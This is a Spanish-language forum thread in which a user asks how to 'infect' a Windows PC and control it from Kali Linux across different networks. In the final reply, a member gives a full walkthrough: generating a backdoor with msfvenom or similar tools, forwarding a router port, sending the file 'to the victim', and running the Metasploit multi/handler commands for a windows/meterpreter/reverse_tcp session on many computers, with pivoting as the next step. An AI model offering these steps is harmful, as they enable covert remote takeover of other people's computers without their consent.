Conecion remota de kali linux a windows desde 2 redes distintas?

Iniciado por jeblaje, 28 Septiembre 2017, 23:50 PM

0 Miembros y 1 Visitante están viendo este tema.

jeblaje

Hola amigos que tal.

He buscado en Internet al menos algo parecido al titulo y no he podido encontrar una solución clara o parecida la duda que tengo es como puedo conectarme a un equipo remoto desde kali linux a windows desde dos redes wifi diferente. obtener sesiones como las de metasploit.

Gracias....

BloodSharp

Cita de: jeblaje en 28 Septiembre 2017, 23:50 PMy no he podido encontrar una solución clara o parecida la duda que tengo es como puedo conectarme a un equipo remoto desde kali linux a windows desde dos redes wifi diferente. obtener sesiones como las de metasploit.

Un conexión inversa con metasploit debería funcionar... ¿Cuál es el problema real?


B#



jeblaje

Lo que se pretende es infectar una maquina y tener acceso a ella desde una red wifi diferente a la que esta conectada.

EJEMPLO: mi pc de la casa que esta conectada obviamente a mi red wifi de mi casa valgame la redundancia y mi laptop en caso dado que yo este en mi lugar de trabajo...

Tengo entendido que con metasploit debo estar conectado a la misma red para poder configurar el payload con sus direcciones ip respectivas pero si estoy conectado a una red diferente mi ip cambiara y no tendré una conexión reversa ya que no fue la dada en tal payload...

BloodSharp

Cita de: jeblaje en 29 Septiembre 2017, 02:38 AM
Lo que se pretende es infectar una maquina y tener acceso a ella desde una red wifi diferente a la que esta conectada.

¿Y tenés el permiso para hacer eso?

Cita de: jeblaje en 29 Septiembre 2017, 02:38 AMTengo entendido que con metasploit debo estar conectado a la misma red para poder configurar el payload con sus direcciones ip respectivas

No realmente...


B#



jeblaje

La otra pc a la que intento acceder es mia tambien solo que la tengo en mi casa la otra es mi laptop que llevo a todas partes...


y como podría hacer tal cosa...????

BloodSharp

Cita de: jeblaje en 29 Septiembre 2017, 03:11 AMy como podría hacer tal cosa...????

Tendrías que guardar la dirección pública de tu casa, abrir el puerto deseado y generar el "servidor" (conexión directa)... el servidor tiene que estar activo en tu casa y conectarte a la ip de tu casa desde donde sea...


B#



jeblaje

Cita de: BloodSharp en 29 Septiembre 2017, 03:40 AM
y generar el "servidor" (conexión directa)... el servidor tiene que estar activo en tu casa


B#

No quiero parecer un noob pero creo que seria mejor algún texto o lugar donde podría encontrar esa información un poco mas especifica disculpa la jodedera por decirlo asi si me podrías facilitar lo que te pido..

Y como asi un servidor???

BloodSharp

Cita de: jeblaje en 29 Septiembre 2017, 03:56 AMalgún texto o lugar donde podría encontrar esa información un poco mas especifica disculpa la jodedera por decirlo asi si me podrías facilitar lo que te pido..

Y como asi un servidor???

Tendrías que utilizar el payload "windows/shell/bind_tcp" con MSFvenom


B#



jeblaje

Muchas Gracias averiguare acerca de ese payload Gracias nuevamente...

edwinosky

puedes hacer lo que deseas
te explico algunois detalles que debes de tener en cuenta
al momento de generar el backdoor, puedes hacerlo con msfvenon, fatrat o winpayloads (que es mi favorito) debes de colocar la  ip publica de tu compuadora de la casa, esa ip publica puedes obtenerla desde la terminar de kali con el comando:
curl ifconfig.me

en la creacion del backdoor debes de elegir un puerto, ej: 4445
ok despues que tengas el backdoor creado con tu ip publica debes de ingresar a la configuracion de tu router y abrir ese puerto, osea asignarle ese puerto a la ip privada de tu computadora
(puedes buscar en youtube como abrir puertos en router "tal marca" ya que ese paso es bien importante para recibir la conexion, y en ese paso es que fallan muchas personas porque al no abrir correctamente los puertos no podras recibir la conexion reversa)

Sino deseas involucrar tu ip publica directamente hay un manera de hacerlo con una ddns de noip.com pero ya eso es otro asunto que debes de profundizar despues que sepas como obtener la sesion meterpreter

Ok despues que abras los puertos y tengas tu backdoor debes de enviarlo a la victima pero antes debes de tener metasploit en escucha en tu Kali linux te dejo los comanndos a continuacion:
service postgresql start ( para iniciar el servicio de base de datos)

msfconsole ( para abrir la consola metasploit)

use multi/handler ( para usar el exploit multi handler que es el encargado de recibir la conexion)

set payload windows/meterpreter/reverse_tcp (eso es para seleccionar el payload con el cual configuraste tu backdoor, yo supongo que usaste este, pero al momento de crear el backdoor podras usar otros payloads que debes de seleccionarlo en este paso, este es el mas comun y sencillo)

set lhost 192.168.x.x (aqui debes de colocar la ip privada de tu kali, muchos aqui ponen la ip publica suponiendo que estan usando la ip publica en la creacion del backdoor pero el detalle esta que al tu asignarle el puerto a ese ip privada en la configuracion de tu router, todas las conexiones entrantes a tu ip publica sera redirigida a ese puerto de esa ip privada, podras ver la ip privada abriendo otra ventana y usando el comando ifconfig)

set lport 4445 (para seleccionar el puerto, dije que usaria como ejemplo 4445 pero puedes usar el que tu hayas usados al momento de crear el backdoor)

exploit -j (hay ya tendras metasploit en escucha, se usa el -j para que recibas todas las conexiones que quieras, es decir podras ejecutar tu backdoor en varias computadoras y recibiras todas las sesiones meterpreter sin problemas)

Y bueno hay ya deberias de tener una sesion meterpreter con computadoras en diferentes redes, No soy un experto, tambien estoy en proceso de aprendisaje pero ya en este momento creo que supere la etapa inicial que es donde creo que estas, ahorita estoy aprendiendo otras cosas, como por ejemplo usar arp, route y portfwd en la sesion meterpreter para tomar el control de las otras computadoras que esten en la red de la pc victima, tambien estoy aprendiendo como migrar la sesion meterpreter fuera de metasploit son un socks para poder usar otras herramientas de kali con la pc victima...
Espero te haya ayudado!